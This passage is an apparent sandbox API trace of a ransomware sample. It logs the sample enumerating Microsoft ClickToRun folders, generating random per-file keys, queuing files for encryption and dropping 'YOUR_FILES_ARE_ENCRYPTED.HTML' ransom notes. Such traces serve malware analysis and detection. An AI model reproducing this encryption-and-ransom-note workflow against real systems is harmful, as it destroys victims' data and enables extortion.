ftLastWriteTime.dwHighDateTime=0x1d0d7ef, nFileSizeHigh=0x0, nFileSizeLow=0xd81d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.en-us.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0155.304] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.304] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0155.332] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\en-us.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\en-us.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.333] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.335] CloseHandle (hObject=0x594) returned 1 [0155.336] GetProcessHeap () returned 0x270000 [0155.336] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: hHeap=0x270000) returned 1 [0155.336] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x-none.16", cAlternateFileName="")) returned 1 [0155.336] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned 86 [0155.336] GetProcessHeap () returned 0x270000 [0155.336] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7410060 [0155.337] lstrcpyW (in: lpString1=0x7410060, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16" [0155.337] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*" [0155.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0155.337] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.337] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x206dcf00, ftLastWriteTime.dwHighDateTime=0x1d0d7ee, nFileSizeHigh=0x0, nFileSizeLow=0x5220, dwReserved0=0x0, dwReserved1=0x60, cFileName="MasterDescriptor.x-none.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0155.337] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml") returned 114 [0155.337] lstrcmpW (lpString1="MasterDescriptor.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.337] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml") returned=".xml" [0155.337] lstrlenW (lpString=".xml") returned 4 [0155.337] PathFindExtensionW (pszPath="MasterDescriptor.x-none.xml") returned=".xml" [0155.337] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0155.337] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0155.338] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=21024) returned 1 [0155.338] GetProcessHeap () returned 0x270000 [0155.338] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.339] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="75") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="DB") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="66") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="12") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="43") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="30") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="D6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="35") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E5") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="8D") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="01") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="5B") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="1C") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A3") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="58") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="20") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="E7") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="BA") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="B0") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="B6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="F6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="1C") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="3E") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="0F") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="E6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="BD") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="22") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="E8") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A6") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="7F") returned 2 [0155.339] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="3C") returned 2 [0155.340] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="05") returned 2 [0155.340] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\MasterDescriptor.x-none.xml" [0155.340] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.340] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.342] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x0, dwReserved1=0x60, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1 [0155.342] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\s320.hash") returned 96 [0155.342] lstrcmpW (lpString1="s320.hash", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.342] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0155.342] lstrlenW (lpString=".hash") returned 5 [0155.343] PathFindExtensionW (pszPath="s320.hash") returned=".hash" [0155.343] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0155.343] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat") returned 112 [0155.343] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.343] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat") returned=".dat" [0155.343] lstrlenW (lpString=".dat") returned 4 [0155.343] PathFindExtensionW (pszPath="stream.x86.x-none.man.dat") returned=".dat" [0155.343] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0155.343] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\stream.x86.x-none.man.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0155.351] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=3716558) returned 1 [0155.351] GetProcessHeap () returned 0x270000 [0155.351] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7420068 [0155.352] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="76") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="61") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="DB") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="F4") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="80") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A9") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="0B") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="FF") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="51") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="B0") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="93") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="23") returned 2 [0155.352] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="2C") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="90") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="AF") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="A3") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="CA") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2A") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="90") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="22") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="00") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="EA") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="91") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="7B") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="69") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="2D") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="FC") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="62") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="22") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="3F") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="F8") returned 2 [0155.353] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="0A") returned 2 [0155.354] lstrcpyW (in: lpString1=0x743011c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\stream.x86.x-none.man.dat" [0155.354] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7420068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.354] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7420068, lpOverlapped=0x7420068) returned 1 [0155.362] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e4dbcf0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e4dbcf0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x0, dwReserved1=0x60, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0155.362] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0155.362] wnsprintfW (in: pszDest=0x7410060, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0155.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\x-none.16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\x-none.16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x594 [0155.363] WriteFile (in: hFile=0x594, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0155.365] CloseHandle (hObject=0x594) returned 1 [0155.365] GetProcessHeap () returned 0x270000 [0155.366] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7410060 | out: hHeap=0x270000) returned 1 [0155.366] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2e48fa30, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2e501e50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2e501e50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0155.366] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0155.366] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0155.367] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\5DF8E020-832F-493E-A40D-17A803C0D548\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\5df8e020-832f-493e-a40d-17a803c0d548\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0155.367] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0155.369] CloseHandle (hObject=0x58c) returned 1 [0155.370] GetProcessHeap () returned 0x270000 [0155.371] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.371] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fc83790, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x2fc83790, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x2fc83790, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7b6, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeploymentConfig.0.xml", cAlternateFileName="DEPLOY~1.XML")) returned 1 [0155.371] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned 62 [0155.371] lstrcmpW (lpString1="DeploymentConfig.0.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.371] PathFindExtensionW (pszPath="DeploymentConfig.0.xml") returned=".xml" [0155.371] lstrlenW (lpString=".xml") returned 4 [0155.371] PathFindExtensionW (pszPath="DeploymentConfig.0.xml") returned=".xml" [0155.371] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0155.371] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\deploymentconfig.0.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0155.371] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=1974) returned 1 [0155.371] GetProcessHeap () returned 0x270000 [0155.371] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7400058 [0155.372] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="21") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="4D") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="65") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="3A") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="EC") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="68") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="B2") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="84") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="35") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="11") returned 2 [0155.372] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="8E") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="76") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B5") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="EE") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="CC") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="97") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="FE") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="72") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="90") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="76") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="E1") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="65") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="36") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="A3") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A4") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="FE") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="51") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="24") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="5B") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="9C") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="71") returned 2 [0155.373] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="40") returned 2 [0155.374] lstrcpyW (in: lpString1=0x741010c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml" [0155.374] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7400058, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.374] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7400058, lpOverlapped=0x7400058) returned 1 [0155.377] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x96c2d3b0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x96c2d3b0, ftLastAccessTime.dwHighDateTime=0x1d709b8, 